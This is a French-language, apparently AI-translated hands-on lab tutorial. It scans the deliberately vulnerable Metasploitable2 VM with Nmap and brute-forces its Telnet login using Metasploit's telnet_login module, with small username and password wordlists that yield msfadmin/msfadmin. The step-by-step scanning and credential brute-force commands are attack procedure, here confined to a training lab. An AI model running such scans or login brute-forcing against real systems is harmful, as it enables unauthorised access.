Exploiter une vulnérabilité du service Telnet avec Metasploit

NmapNmapBeginner
Pratiquer maintenant

💡 Ce tutoriel est traduit par l'IA à partir de la version anglaise. Pour voir la version originale, vous pouvez cliquer ici

Introduction

Dans ce laboratoire (lab), nous allons apprendre à exploiter la vulnérabilité du service Telnet et à effectuer une attaque de pénétration. Le scénario consiste à utiliser la machine Kali Linux comme machine attaquante et la machine virtuelle Metasploitable2 comme machine cible. L'objectif est de scanner la machine cible pour détecter les vulnérabilités, identifier la vulnérabilité du service Telnet et l'exploiter à l'aide du Framework Metasploit.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL wireshark(("Wireshark")) -.-> wireshark/WiresharkGroup(["Wireshark"]) hydra(("Hydra")) -.-> hydra/HydraGroup(["Hydra"]) nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/installation("Installation and Setup") nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/timing_performance("Timing and Performance") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") nmap/NmapGroup -.-> nmap/scripting_basics("Scripting Engine Basics") wireshark/WiresharkGroup -.-> wireshark/commandline_usage("Command Line Usage") hydra/HydraGroup -.-> hydra/installation("Installation and Setup") subgraph Lab Skills nmap/installation -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} nmap/port_scanning -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} nmap/host_discovery -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} nmap/target_specification -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} nmap/timing_performance -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} nmap/service_detection -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} nmap/scripting_basics -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} wireshark/commandline_usage -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} hydra/installation -.-> lab-416133{{"Exploiter une vulnérabilité du service Telnet avec Metasploit"}} end

Démarrer l'environnement de laboratoire

Dans cette étape, nous allons démarrer l'environnement de laboratoire, qui comprend le conteneur Kali Linux et la machine virtuelle Metasploitable2.

  1. Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

  1. Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
  1. À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

Maintenant, la machine attaquante et la machine cible sont toutes deux en cours d'exécution, et vous pouvez commencer les tests de pénétration.

Remarque : Si vous quittez accidentellement le bash actuel, le conteneur Kali s'arrêtera automatiquement. Vous pouvez exécuter docker run -ti --network host b5b709a49cd5 bash à nouveau sur l'hôte pour démarrer un nouveau conteneur Kali et entrer dans le bash pour continuer l'expérience.

Effectuer un scan de vulnérabilités

Dans cette étape, nous allons utiliser Nmap pour scanner la machine cible à la recherche de ports ouverts et de services.

Tout d'abord, démarrez la base de données PostgreSQL, car Metasploit en a besoin pour stocker les données :

service postgresql start
msfdb init
cd ~
msfconsole

Dans la console Metasploit, exécutez le scan Nmap sur la machine cible :

nmap -sV -T4 192.168.122.102

L'option -sV permet de scanner les ports ouverts et d'afficher des informations détaillées sur les ports, tandis que -T4 définit la stratégie de temporisation du scan (de 0 à 5, les valeurs plus élevées sont plus rapides mais plus bruyantes).

Analyser les résultats du scan

Dans cette étape, nous allons analyser les résultats du scan Nmap pour identifier le service Telnet vulnérable.

La sortie du scan Nmap montre que le service Telnet est en cours d'exécution sur le port 23 avec la bannière "Linux telnetd". Recherchons le module Metasploit correspondant :

search scanner/telnet

Utilisons le module auxiliary/scanner/telnet/telnet_login :

use auxiliary/scanner/telnet/telnet_login

Affichons les options du module :

show options

L'option requise est RHOSTS, qui spécifie le(s) hôte(s) cible(s).

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Préparer le dictionnaire de noms d'utilisateur et de mots de passe

Dans cette étape, nous allons préparer les fichiers de dictionnaire de noms d'utilisateur et de mots de passe pour l'attaque de force brute de connexion.

Ouvrez un nouveau terminal et connectez-vous au conteneur Kali :

docker run -ti --network host b5b709a49cd5 bash

Créez un fichier username.txt dans le répertoire / avec les noms d'utilisateur suivants :

123456
admin
msfadmin
root
kali

Créez un autre fichier password.txt dans le répertoire / avec les mots de passe suivants :

abc123
1234
123456
root
msfadmin
admin
toor

Ces fichiers seront utilisés comme dictionnaires de noms d'utilisateur et de mots de passe pour l'attaque de force brute.

Configurer le module Metasploit

Dans cette étape, nous allons configurer le module Metasploit avec l'hôte cible, le dictionnaire de noms d'utilisateur et le dictionnaire de mots de passe.

Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :

cd ~
msfconsole

Utilisez le module auxiliary/scanner/telnet/telnet_login :

use auxiliary/scanner/telnet/telnet_login

Définissez l'hôte cible :

set RHOSTS 192.168.122.102

Définissez le fichier de dictionnaire de noms d'utilisateur :

set USER_FILE /username.txt

Définissez le fichier de dictionnaire de mots de passe :

set PASS_FILE /password.txt

Enfin, exécutez l'exploit :

exploit

Metasploit commencera à tester différentes combinaisons de noms d'utilisateur et de mots de passe à partir des dictionnaires fournis. Si des identifiants valides sont trouvés, ils seront affichés en vert.

Dans ce cas, les identifiants valides sont msfadmin/msfadmin.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire, nous avons appris à exploiter la vulnérabilité du service Telnet en utilisant le Framework Metasploit. Nous avons commencé par configurer l'environnement de laboratoire avec la machine d'attaque Kali Linux et la machine cible Metasploitable2. Nous avons ensuite effectué un scan de vulnérabilités à l'aide de Nmap pour identifier le service Telnet ouvert. Ensuite, nous avons préparé les dictionnaires de noms d'utilisateur et de mots de passe et configuré le module Metasploit avec l'hôte cible et les fichiers de dictionnaire. Enfin, nous avons exécuté l'exploit et avons réussi à forcer les identifiants de connexion Telnet.

Ce laboratoire a offert une expérience pratique en matière de test de pénétration, de scan de vulnérabilités et d'utilisation du Framework Metasploit pour exploiter les vulnérabilités. Il a mis en évidence l'importance des pratiques de mot de passe sécurisées et les risques potentiels liés à l'utilisation d'identifiants faibles ou faciles à deviner.